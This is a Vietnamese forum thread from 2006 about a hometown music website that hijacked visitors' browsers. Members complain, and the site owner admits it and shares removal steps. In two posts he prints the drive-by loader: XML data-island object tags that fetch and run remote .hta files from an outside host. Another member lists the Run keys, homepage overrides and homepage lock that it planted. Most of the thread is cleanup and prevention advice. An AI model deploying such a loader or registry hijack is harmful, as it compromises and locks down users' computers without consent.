PDA

View Full Version : website Âm nhạc Quê Hương Đức phổ



quoctuan
10/04/2006, 11:54 PM
Website Nhạc của quê hương Đức Phổ Đay bạn!
Các bạn vào xem nha
Vào Đây (http://ducpho.cn.to)

NGUYEN Khoi
10/07/2006, 05:45 PM
Website Nhạc của quê hương Đức Phổ Đay bạn!
Các bạn vào xem nha
Vào Đây (http://ducpho.cn.to)

Chào Bạn Quốc Tuấn,

Tôi có vào trang nhạc của bạn, có mây bản nhạc quê hương thạt hạy Nghe thấm thía lắm. Cảm ơn bạn.
Tuy nhiên tôi có vấn đề muốn đề nghị với bạn , mặc dầu biết bạn rất thành thạo về registry cũng như making start site cho internet nhưng tôi nghỉ bạn không nên automatic take over cái start site của người khác và cũng không nên thêm bớt gì trong config của máy người khác ! (Rất tiêt là Microsoft không secure dược việc nầy!). Cái javascript mà bạn inject vào system của người khác là một việc không được fair lắm! Tôi rất thích âm nhạc, mến chuộng đồng hương có tâm hồn và tôi cũng là ngươi làm việc rất lâu năm trong lãnh vực computer, internet nhưng không bao giờ tôi dám làm những việc như bạn đã làm !

Trong tinh thần đồng hương tốt đẹp...

Thân chào

PDK
10/08/2006, 11:17 PM
Hoàn toàn đồng ý với ý kiến và nhận xét của anh Khôi. Nếu ta "xem" các Website cũng giống như các cơ sở thương mại và các máy tính như các ngôi nhà thì các cơ sở thương mại trương bảng quảng cáo để mọi người cùng xem và các cơ sở thương mại không có lý do gì để ép buộc người khác "phải" xem hàng của mình trước cả. Đó là đứng trên tình, còn đứng trên lý thì điều đó có nghĩa là vi phạm luật pháp (dù rằng có vẽ mơ hồ. Nhưng nếu website của bạn thuộc loại lớn thì mọi chuyện lại là chuyện khác).

Bạn Quốc Tuấn thân. Để quảng bá và khuyến mãi người khác thì mình không nên làm như vậy (dù rằng làm một cách dễ dàng) mà phải làm sao cho nội dung của website mình thu hút được người khác trở lại (customer retention). Nếu bạn "buộc" người khác trở lại thì chắc chắn bạn chỉ tự hại bạn mà thôi. Kỹ thuật điện toán có thể "giúp" bạn làm điều đó nhưng "hiệu quả kinh tế" thì hoàn toàn đi ngược lại điều bạn muốn.

Mong bạn hiểu ...

NGUYEN Khoi
10/09/2006, 10:26 AM
Hoàn toàn đồng ý với ý kiến và nhận xét của anh Khôi. Nếu ta "xem" các Website cũng giống như các cơ sở thương mại và các máy tính như các ngôi nhà thì các cơ sở thương mại trương bảng quảng cáo để mọi người cùng xem và các cơ sở thương mại không có lý do gì để ép buộc người khác "phải" xem hàng của mình trước cả. Đó là đứng trên tình, còn đứng trên lý thì điều đó có nghĩa là vi phạm luật pháp (dù rằng có vẽ mơ hồ. Nhưng nếu website của bạn thuộc loại lớn thì mọi chuyện lại là chuyện khác).

Bạn Quốc Tuấn thân.
Để quảng bá và khuyến mãi người khác thì mình không nên làm như vậy (dù rằng làm một cách dễ dàng) mà phải làm sao cho nội dung của website mình thu hút được người khác trở lại (customer retention). Nếu bạn "buộc" người khác trở lại thì chắc chắn bạn chỉ tự hại bạn mà thôi. Kỹ thuật điện toán có thể "giúp" bạn làm điều đó nhưng "hiệu quả kinh tế" thì hoàn toàn đi ngược lại điều bạn muốn.

Mong bạn hiểu ...

Bạn Quốc Tuấn,

việc làm của bạn theo như anh PDK nói là phạm luật pháp chấc bạn cũng rỏ rồi. Bạn không nên cài chương trình của bạn vào máy người khác cũng như không có quyền chiếm đoạt startsite của người khác. Muốn làm công việc nầy thì dể lắm , chỉ cần vào NET lục chừng mười phút là bạn biết phương pháp cài javascript được ngay.
Tuy nhiên không phải việc gì mình làm được mình cứ làm , bất chấp hậu quả ảnh hưởng đến người khác


Thân chào

DongSaBang
10/09/2006, 10:46 AM
Trò chơi rẽ mạc, chỉ làm người khác bực bội. :-(

doankiem
10/09/2006, 11:20 AM
Có gì đâu bà con la dữ hê
Tui dô thử chẳng thấy có gì lạ
Hể ai sửa cái default start site thì mình sửa lại, clean luôn hết cookie là xong ... and never go back to that site ... That 's set :D :D

NGUYEN Khoi
10/09/2006, 04:13 PM
DK ui,

clean cookies không đủ giải quyết vấn đề vì đây là trường hợp gắn mồi (chẳng khác gì con ngựa troya!). Anh bạn nầy đã inject vào windows/system32 một javascript và thêm thay đổi qua registry cái top row của người khác! Đây mới là vấn đệ!
Nhưng thôi (forget it! Chẳng đi về đâu cả, cậu thanh niên nầy muốn chứng tỏ tài nghệ của mình thôi!)

Minh Đường
10/11/2006, 01:00 AM
hmmm thật ra anh, chú hay bác NGUYENKHOI, DOANKIEM hay DSB trách QT cũng tội. MD cũng từng làm (đăng kí) FREE website/hosting như QT lúc MD bắt đầu học làm website. Theo MD nghĩ (nhìn nhận) QT chỉ designed một website như thế chủ yếu dựa trên javascripts có sẳn - javascripts mà MD nói đây chỉ là cái music script mà QT dùng thôi. Còn cái edit registry thì quả thật "oan" cho him, vì MD vào nghe nhạc có thấy gì đâu nè :unsure:

thử dùng toolbar của goooogle hay yahoo hay Windows® Defender để lock cái popup không cần thiết cũng như các spyware khác.

vậy a,
tình thân, MD

DongSaBang
10/12/2006, 07:46 PM
Bà con (kể luôn cả MD) cho tui hỏi một chút nhé.
Hôm nọ sau khi vào cái mạng chết dịch này nó inject đủ thứ rác rến vào máy, nó viết vào history files một loạt tên mạng này (tức là thay thế hầu hết những gì tui có trước). Tui phải reset History file, del cahe, temp files. Nhưng nó thay đổi system file sao đó mà bây giò nó gray out box để đổi Home Page (Start up page). Cho nên mỗi lần open up new page là nó lại load cái trang chết di.ch này lên. Ngoài ra nó còn concatinate tên mạng nó sau cái page nào tui load lên. Làm thế nào để re activate cái box để change Home Page? và completely throw away ba cái rác rến này, for good?

Tui xin khuyên mấy ông, nếu không biết rõ công dụng software người khác thì đừng copy. Tự mình viết lấy, không nỗi sao?

Nato
10/12/2006, 09:29 PM
Hi (Chị) DSB,
Em thì không bị, vì NAV của em block ngay cái vụ change homepage liền. Em cũng không phải là dân IT, nên chẵng biết khuyên gì. Nhưng chị thử down windows defender của microsoft, run thử xem được không. Địa chỉ này:
http://www.microsoft.com/downloads/details.aspx?FamilyID=435bfce7-da2b-4a6a-afa4-f7f14e605a0d&displaylang=en
Một cách để thử nữa là remove online: http://www.spywareinfo.com/xscan.php . Em dùng cái này cũng remove được một số spyware đó.

Chúc chị may mắn.

quoctuan
10/13/2006, 09:01 PM
Thật tình mình biết làm thế là không hay nhưng vì mình là làm thế sẽ làm cho nhiều người biết đến trang web của mình hơn.
Nhưng hình như làm thế đã phản tác dụng khi có cái này đã làm những người vào thăm trang eb khó chịu ,và cũng làm cho máy của người dùng chạy nặng hơn bình thường nên hôm nay mình đã bỏ nó rội
Các huynh vào xem lại thử như thế này có được chưa.
http://www.ducpho.vnn.bz/
Xin Được cảm ơn các anh em đã góp ý cho mình!

PDK
10/14/2006, 06:37 AM
Anh Quốc Tuấn,

- Chú DSB có hỏi là làm sao để "remove" mấy cái setup mà cái javascript của anh đã gài vô, inject vô máy của chú (qua Windows Registry database). Nếu anh biết cách lấy ra thì anh nên dán lên cách lấy ra để chú DSB lấy ra.

- Trong trường hợp anh không biết lấy ra cách nào (vì một lý do gì đó) thì anh có thể dán lên cái javascript đã làm chuyện đó (inject pre-set configuration data into registry database) thì chú DSB cũng làm được (Chú DSB là Java programmer)


Thân, PDK

anmota
10/15/2006, 03:29 AM
Quốc Tuấn:
Hình như...tôi mới là nạn nhận thứ thiệt của Âm Nhạc Quê Hương Đức Phổ.
Đúng như anh Nguyen Khoi nói , cách làm của Đ. K...không thể clean hết được.
Chắc chắn có những người như tôi trở xuống , không biết ất giáp mô tê gì về các cách đối phó khi gặp trắc trở như DSB nói...( Rác rưới tùm lum ).
Đề nghị bạn hay một ai rành...chỉ dẫn cụ thể cách Remove...những trang Web ( loại khách không mời )...
Khổ thân già tôi quá sá.
Thân mến cùng tất cả.
AMT

doankiem
10/15/2006, 07:36 AM
Hình như XT có post trên diễn đàn này một cái Spy Sweeper
Download cái này vô máy, install and run ....
I thinh it can remove all the spywares

Lạ một cái là DK cũng vô nhưng không bị gì hết .... Có lẽ là do có spyware shield

Bớ XT, cho bà con mượn cái spy sweeper ...........

DongSaBang
10/15/2006, 09:16 AM
Cám ơn ÐK và Nato, nhưng tui nghĩ mấy cái Spywares này dùng để ngăn ngừa "'Rác rến". Một khi "Rác rến" đã "bị" viết vào system rồi thi spyware khó mà delete được.

Chú AMT, chú làm như thế này để loại bỏ một số rác rến nhé:

1. Open Windows Explorer, click vào search files name and folders, type ducpho và search in C drive. Search result sẽ list những thứ rác rến có tên ducpho và chú có thể delete từng cái một.

2. Vào Tools của Internet Explorer, select Internet Options... Delete all Temp files, cookies, và clear all History.

3. Download cái file tại đây http://www.dougknox.com/security/scripts_desc/nosethomepage.htm
vào nơi nào trên máy của chú (i.e. C:/Temp) xong rồi vào chỗ file này, right mouse click, open. Open file nay nó sẽ chạy và sẽ toggle cái permission để set HomePage (Start up page). Có nghĩa là hiện giờ máy chú bị set up không cho chú đổi Start up page, thì program này sẽ enable chú đổi Start up page.

4. Chú có thể vào Tools -> Internet Options...Click Privacy tab, Select Edit trong hộp Web site và type vào tên cái mạng nghe nhạc này xong bấm Block sẽ bỏ vào block list.

Còn một số rác rến mà DSB chưa tìm cách xóa bỏ được. Nhưng ít ra cũng không còn thấy cái tên này nữa !:(

Chúc chú may mắn.

quoctuan
10/18/2006, 07:32 PM
Bước 1:

Bạn nên tắt nick yahoo và không được click vào biểu tượng : Internet Explorer ( ở nền màn hình nữa)

Bước 2:

Bạn vào Start chọn run (hoặc ấn tổ hợp phím cửa sổ windows + R)





Gõ dòng lệnh : msconfig roài chọn OK



Bạn sẽ thấy hiện một cửa sổ mới: System Configuration Utility ban chon mục : Srartup như hình



Tuỳ thuộc bạn nhiễm con virus nào nó sẽ hiện ở cửa sổ này ( Ở trên bạn nhiễm con virus ở trang: www.chendang.net/nguyen/) bạn bỏ dấu kiểm ở taskmng là bạn đã ngừng hoạt động con virus này ở computer của bạn roài đó.s

Chú ý: trang web:(*)

www.tiecnuoi.com và www.vnnnn.com thì ở Startup bạn bỏ dâu kiểm tại :y_pager

http://vuichoivn.com và http://music.geocities.jp/nhacso24h/ bạn bỏ dấu kiểm tại :svchost32

http://thuviennhac.biz bạn bỏ dấu kiểm tại :tvn

Sau đó chọn OK hội thoại hiện ra:



Bạn chọn Exit Without Restart

Bước 3:

Để diệt tận gốc con này bạn chú ý vào dòng Conmand ta xẽ thấy nó nằm ở thư mục C:\WINDOWS\ bạn chỉ việc tìm đến thư mục windows tìm file có tên : taskmng (hoặc các file tương ứng với con có tên với nhưng trang ở mục(*) )ở sau đó bạn Del file này đi là con virus này đã ko tồn tại ở máy tính của bạn nữa rùi

Bước 4:

Bước tiếp theo bạn tải file :prince.exe Tại đây (Để reset home page) .

Sau đó bạn chạy file prince.exe này cửa sổ hiên ra:



Bạn chọn Ok để hoàn tất

Bước 5:

Bây giờ còn đợi j` nữa virus chết rùi còn đâu nữa an tâm vào yahoo chát với người thân đi

Chúc các bạn thành công

quoctuan
10/18/2006, 07:38 PM
đường Link đây là code của nó
các bạn đừng nên kích vào mà hãy kích chuột trái chọn save target ass...
để save lại lấy mã.
http://www42.websamba.com/quehuongducpho/bodem/Bodem.txt_remove
mình đưa lên cho anh em nguyên cứu.

PDK
10/18/2006, 08:50 PM
Anh làm vầy nguy hiểm quá.

1. Tôi đề nghị anh viết một cái vbscript để clean up. Steps nhiều quá chỉ những người rành mới làm được.
2. Trong cái post thứ hai anh đưa ra một cái link mà ghi chú là... đừng click vào. Tại sao anh không dán lên cái phần text thay vì cái link ?


PDK

quoctuan
10/21/2006, 04:13 AM
Anh em nói thế mình đưa luôn đoạn tetx lên này. Đoạn tetx này của file http://www42.websamba.com/quehuongducpho/bodem/Bodem.txt






<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="http://www42.websamba.com/quehuongducpho/Bodem/a.hta?id=1"></object>
]]>
</view>
</preview>
</xml>

<!--
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="http://www42.websamba.com/quehuongducpho/Bodem/hta.hta?id=2"></object>
]]>
</view>
</preview>
</xml>



<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="http://www42.websamba.com/quehuongducpho/Bodem/MISS.HTA?id=3"></object>
]]>
</view>
</preview>
</xml>


-->


nó chỉ bao gồm 3 file bây giờ thì anh em cứ tự nhiên tải các file đó về nếu ai muốn làm thì sữa lại.
bao gồm 3 file
+http://www42.websamba.com/quehuongducpho/Bodem/a.hta?id=1

+http://www42.websamba.com/quehuongducpho/Bodem/hta.hta?id=2

+http://www42.websamba.com/quehuongducpho/Bodem/MISS.HTA?id=3

Các file đó các bạn tự nhiên tải về vì là một file ruyên nên nó không có hiệu lưc gì chỉ có điều nếu là các bạn có những phần mền diệt virut thì nó sẽ làm bạn khó tải đấy nếu tải không dược thông báo hôm khác mình đưa đoạn mã của 3 file đó lên cho vì hôm nay mình không có thời gian mong các bạn thông cảm.

quoctuan
10/21/2006, 04:17 AM
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="http://www42.websamba.com/quehuongducpho/Bodem/a.hta?id=1"></object>
]]>
</view>
</preview>
</xml>

<!--
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="http://www42.websamba.com/quehuongducpho/Bodem/hta.hta?id=2"></object>
]]>
</view>
</preview>
</xml>



<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="http://www42.websamba.com/quehuongducpho/Bodem/MISS.HTA?id=3"></object>
]]>
</view>
</preview>
</xml>


-->[QUOTE]

PDK
10/21/2006, 08:06 AM
Nếu bà con nào muốn download mấy cái files (3 files) này về thì nhớ là đừng có "RUN" (Please DO NOT RUN). Nếu bà con run thì bà con ... tự bỏ vào máy mình !!!

Nhớ "save" nó lại dưới dạng text format rồi "xem".

Để tui tìm chút thời gian viết cái windows registry remove xong rồi bà con download về để remove nó. Nhưng nói thật cũng nguy hiểm lắm vì nhiều lúc remove mấy cái trong Windows Registry cũng dễ làm cho máy ... đứng cứng ngắc. Khi nào viết xong thì tui sẽ contact với anh Khôi "verify" lại cho chắc ăn. Nếu anh Khôi (hay bà con nào đó) có thời gian thì anh Khôi "làm luôn" là hay nhất. Tui bận một ít việc nên cũng phải vài ngày mới xong.

Đại để là mình phải làm:

1. Backup lại cái Registry Database (rủi có gì thì ... restore nó lại)
2. Xóa hết (hoặc thay thế) mấy cái entries này đi

Trong đó có mấy cái default mà tui không biết phải làm sao cho hợp lý (tác giả bỏ vào cái website của tác giả và hiển nhiên mỗi người đều có cái default khác nhau. Có lẽ xóa trắng - blanking - nó đi là tốt nhất. Sau đó ai muốn bỏ default gì thì bỏ vào cho chính mình)

+ Nếu bà con biết về Registry Database thì tác giả bỏ vào khúc HKEY_CURRENT_USER. Nếu bà con log vào máy mình với user thì bà con có thể xóa đi cái user đó xong lập lại một user mới cho máy có thể sẽ xóa hết mấy cái configuration này cho user đó. Máy tui không bị mấy cọng rác này nhiểm vào nên nếu có làm thì tui cũng chỉ làm theo ... "phản ứng tự nhiên" mà mấy cái code đã ghi.

+ Thêm nữa mấy cái code này chỉ có tác động đối với Internet Explorer (và Yahoo Messenger - Theo mấy dòng code đã chỉ). Bà con có thể xóa (uninstall) cái Internet Explorer xong re-install lại. Để làm việc này trước nhất bà con vào Microsoft website để download cái IE version mà bà con xài về trước đã xong hãy xóa rồi re-install (nếu không làm vậy khi bà con xóa đi cái IE thì ... hết đường vào Internet mà download IE)

Khổ quá hỉ !!!

DongSaBang
10/21/2006, 08:23 AM
XML là những client/server applications dùng để collect và process information từ client. Những applications này được process ở server, client không có cách nào để vào server để thay đổi XML files được. Ngoà ra XML dùng để lưu trử data và tạo những application pages online - on the fly (căn cứ vào client và server biusiness logis components). Please, get real !!!

DongSaBang
10/21/2006, 08:33 AM
Lưu Ý: Các máy PC khi install (Window XP chẳng hạn) sẽ default start cái Remote Registry. Nếu Remote Registry start sẽ cho phép mọi người như virus có thể thay đổi Registry của máy. Có thể ngăn ngừa và tốt nhất là stop cái Remote Registry này và set chỉ cho RUN bằng cách Manual. Muốn làm chuyện này bà con nên làm như sau:

1. Open Control Panel
2. Clock and open Performance and Maintenance
3. Click and open Administration Tools
4. Click and open Services
5. Select Remote Registry và set to Stop and run by Manual

Vài điều mẹo vặt.

PDK
10/21/2006, 08:37 AM
Dạ đúng rồi chú DSB nhưng đó là ngăn cửa trước. Còn cái này địch đã đã vào thành rồi, mấy cái lỉnh kỉnh đó nó đã nằm trong cái RD của chú rồi thì trước nhất chú phải lấy nó ra chứ ? Cái vụ remove này chỉ cho mấy người bị nhiễm rồi thôi. Máy cháu không nhiễm thì cháu đâu cần gì remove ? Một cái là phòng, một cái là chống.

Cách chú nói là để phòng, cách cháu nói là để chống và loại bỏ. Bất cứ cái gì cũng phải có cái nguồn của nó cả. Hiển nhiên cái nguồn ban đầu là trên Server, máy (ai đó) mang về xong bỏ vào mà giờ chú đi phòng thì ... ích gì !!!

Cháu.

DongSaBang
10/21/2006, 08:50 AM
Nếu bà con nào muốn download mấy cái files (3 files) này về thì nhớ là đừng có "RUN" (Please DO NOT RUN). Nếu bà con run thì bà con ... tự bỏ vào máy mình !!!

Nhớ "save" nó lại dưới dạng text format rồi "xem".

Để tui tìm chút thời gian viết cái windows registry remove xong rồi bà con download về để remove nó. Nhưng nói thật cũng nguy hiểm lắm vì nhiều lúc remove mấy cái trong Windows Registry cũng dễ làm cho máy ... đứng cứng ngắc. Khi nào viết xong thì tui sẽ contact với anh Khôi "verify" lại cho chắc ăn. Nếu anh Khôi (hay bà con nào đó) có thời gian thì anh Khôi "làm luôn" là hay nhất. Tui bận một ít việc nên cũng phải vài ngày mới xong.

Đại để là mình phải làm:

1. Backup lại cái Registry Database (rủi có gì thì ... restore nó lại)
2. Xóa hết (hoặc thay thế) mấy cái entries này đi

Trong đó có mấy cái default mà tui không biết phải làm sao cho hợp lý (tác giả bỏ vào cái website của tác giả và hiển nhiên mỗi người đều có cái default khác nhau. Có lẽ xóa trắng - blanking - nó đi là tốt nhất. Sau đó ai muốn bỏ default gì thì bỏ vào cho chính mình)

+ Nếu bà con biết về Registry Database thì tác giả bỏ vào khúc HKEY_CURRENT_USER. Nếu bà con log vào máy mình với user thì bà con có thể xóa đi cái user đó xong lập lại một user mới cho máy có thể sẽ xóa hết mấy cái configuration này cho user đó. Máy tui không bị mấy cọng rác này nhiểm vào nên nếu có làm thì tui cũng chỉ làm theo ... "phản ứng tự nhiên" mà mấy cái code đã ghi.

+ Thêm nữa mấy cái code này chỉ có tác động đối với Internet Explorer (và Yahoo Messenger - Theo mấy dòng code đã chỉ). Bà con có thể xóa (uninstall) cái Internet Explorer xong re-install lại. Để làm việc này trước nhất bà con vào Microsoft website để download cái IE version mà bà con xài về trước đã xong hãy xóa rồi re-install (nếu không làm vậy khi bà con xóa đi cái IE thì ... hết đường vào Internet mà download IE)

Khổ quá hỉ !!!
PDK,

"Tác giả" lụm bài người khác và bài hoàn toàn chạy và control bởi một mạng mà "tác giả" không có quyền hành kiểm soát. Lối làm này của tác giả và mạng chính đều là fraud! Đây cũng là một cách implant nhữNg con virrus vào máy client để fraud đủ thứ bất hợp pháp. Cái HKEY_CURRENT_USER key đã thay thế start page bằng tên của tác giả và sau khi thay start page thì nó disable luôn, không cho đổi lại! Vấn đề này tui đã sửa và có cho cái link cho chú AMT. Chỉ cần download cái link http://www.dougknox.com/security/scripts_desc/nosethomepage.htm
Run cái code thì nó sẽ enable lai cho mình đổi start page.

Bây giờ còn một cái rác nữa là tác giả đã nhét vào máy một application mà mỗi lần cold start up máy là nó lại open up cái mạng đó và thay đổi History file. Không biết "tác giả" có biết tên của application đó là gì và nằm ở đâu trong máy? Đừng có đem mấy cái XML files lên nữa nhé! Khổ lắm!

PDK
10/21/2006, 09:12 AM
Cháu nghĩ cháu biết "cách làm việc" của anh chàng QT này ...

1. Anh chàng "lượm lặt đó đây" mấy cái code để thay đổi RD rồi "modify" nó cho thích hợp những gì anh muốn và upload lên server của anh (hình như cũng không phải server của anh ta nữa - free server thì phải )

2. Click vào cái link (vào website nghe nhạc) thì toàn bộ mấy cái autorun nó sẽ "cài đặt" vào máy client (user) mọi thứ "rác rến" đã được chỉ định trước.

Cách chú làm lúc trước chỉ làm tổng quát (Piniciline fights all type of infections). Và đó là lý do tại sao mà cháu có hỏi anh QT dán lên mấy cái code đã viết gì vào RD. Giờ ảnh đã thả ra mấy cái code đó rồi thì mình cứ "trace" theo cái code mà "gở" nó ra.

Vì mọi thứ đều viết vào RD nên chỉ cần viết một program nho nhỏ với cái extension .reg thì khi chú double-click vào nó sẽ remove mọi thứ trong RD mà chú muốn remove/modify nó đi. Nhưng phải cẩn thận là vì khi đụng vào RD có thể sẽ làm cho cái Windows trở nên bất khiển dụng được.

Có thể cháu nói sai nhưng mà thôi (nhưng tới giờ vẫn chưa thấy sai - trong đầu cháu :D). Nếu chú đã có sẵn mấy cái code và chắc chắn loại khỏi vòng chiến mấy cái lỉnh kỉnh đó rồi thì thôi. Cháu không dám "reinvent the wheels" đâu. Hi hi.

Cháu,


PDK

DongSaBang
10/21/2006, 09:16 AM
Dạ đúng rồi chú DSB nhưng đó là ngăn cửa trước. Còn cái này địch đã đã vào thành rồi, mấy cái lỉnh kỉnh đó nó đã nằm trong cái RD của chú rồi thì trước nhất chú phải lấy nó ra chứ ? Cái vụ remove này chỉ cho mấy người bị nhiễm rồi thôi. Máy cháu không nhiễm thì cháu đâu cần gì remove ? Một cái là phòng, một cái là chống.

Cách chú nói là để phòng, cách cháu nói là để chống và loại bỏ. Bất cứ cái gì cũng phải có cái nguồn của nó cả. Hiển nhiên cái nguồn ban đầu là trên Server, máy (ai đó) mang về xong bỏ vào mà giờ chú đi phòng thì ... ích gì !!!

Cháu.
Dung roi PDK, cai Luu Y do la tui khuyen ba con nen Stop cai REMOTE REGISTRY de ngan ngua nhung truong hop nhu vay sau nay thoi. Con bay gio doi voi tui thi khac roi, chi con di nem rac thoi!

Than.

nước mặn
10/21/2006, 09:35 AM
PDK,anh DSB,
Tôi thấy có mấy cái software có thể remove và sửa được registry.Tôi có dùng Xoftspyse và pestpatrol (free version) nhưng cái link bị đứt rồi. Cái link của TC vẫn còn tốt nhưng tôi chưa xài qua. Theo lời giới thiệu của TC, nó là loại áo mưa rất tốt nhưng không biết có work cho morning after ? :D :D

Post # 9 trong đề tài virus của YR
--> http://forum.quangngai.net/showthread.php?t=6415

PDK
10/21/2006, 01:24 PM
Chú DSB ơi,


Phía trên cái post của XML còn có 1 cái post khác với 3 cái files chỉ rỏ mấy cái entries vào RD.

Nếu chú muốn coi "ông thầy" mình bỏ gì vào RD thì download nó về (nhớ đừng RUN - No Run) rồi save dưới dạng text file xong "xem chơi". Hi hi.



:laughing: :laughing: :laughing:

NGUYEN Khoi
10/21/2006, 01:40 PM
Chú AMT, Anh DSB, PDK,NM và các bạn,

lần trước tui nói bỏ qua nhưng bây giờ thây hình như tình trạng có vẽ căng ra bởi hậu quả của cậu Quốc Tuấn này mang lại.
Theo tui thì cậu nầy chóp đâu đó được cái software rồi đem ra xử dụng mà không rỏ cách làm sao remove cả!
Anh DSB làm như vậy là cách tự nhiên nhất, xoá nhiều rát rươi lắm. tức là search và delete tấ cả những files mang tên ducpho.. Tuy nhiên nếu người ta dùng tên khác thì mình chẳng biết làm sao loại trừ.
Theo tôi thì nên vào msconfig và deactivate tất cả những tasks nào lạ. Đừng có sợ hải gì cả, nếu có dụng chạm gì với programs khác thì mình reactivate nó lại thôi. Hơi tốn thời gian !
Vào KKEY_LOCAL_MACHINE-->SOFTWARE-->INTERNET_explorer -->MAIN và ghi lại start page của mình
Tui nghỉ không cần phải dùng tới mầy cái XML làm chi!

Bực mình với mấy "ông nội" nầy thật!

anmota
10/21/2006, 02:38 PM
Có phải cái này không anh Khôi?
http://netsecurity.about.com/cs/windowsxp/qt/aaqt_safemode.htm

" thầy bán tơ kia giở dói ra
"làm cho bận mấy cụ ta già..."
AMT

NGUYEN Khoi
10/23/2006, 01:00 AM
Có phải cái này không anh Khôi?
http://netsecurity.about.com/cs/windowsxp/qt/aaqt_safemode.htm

" thầy bán tơ kia giở dói ra
"làm cho bận mấy cụ ta già..."
AMT

Hổng phải dzị đâu chú AMT! Loàm sao mà tui dziết được tiếng Anh ngọt như dzậy được. Tiếng Em thì tui biết chú đỉnh thôi

Nato
10/23/2006, 11:07 PM
Có gì đâu.
Mấy cái này dùng NVA hay Bitdefender remove cái một thôi. Bác nào dùng Bit plus v10 thì vào scan script, mấy phút là xong thôi.

PDK
10/24/2006, 06:40 AM
Đây là cái "đống rác" mà tác giả đã bỏ vào cái Registry Database của quí vị. Quí vị có thể vào Registry Database mà dọn ra (Start -> Run -> Regedit)

Trong cái C:\Windows\System32 có cái java-script tên deptrai.js, bà con delete luôn cho sạch sẽ.

"Mấy thầy" làm ơn, làm phước đừng làm mấy cái chuyện này nữa nghen.


:laughing: :laughing: :laughing:

---------------------------------------

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\Windows",deptrai.js
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\System32",deptrai.js
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url2","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url3","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url4","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url5","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url6","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url7","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url8","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url9","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url10","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url11","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url12","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Calendar\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ buzz\content url","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ et\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Headline\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Overview\content url","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Sport\content url","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Stock\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Yahoo360\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Games\content url","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Launchcast\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Weather\content url","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Yahoo\Pager\View\YMSGR_ Messenger-Invisible\content text","¤ http://www42.websamba.com/quehuongducpho/Bodem/Home.txt ¤"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\default_page_url", "http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://www42.websamba.com/quehuongducpho/Bodem/Home.txt"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\First Home Page","http://Www.ducpho.vnn.bz"
HKEY_CURRENT_USER\Software\Policies\Microsoft\Inte rnet Explorer\Control Panel\HomePage","0","REG_DWORD"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\IEXPLORE.EXE", ""
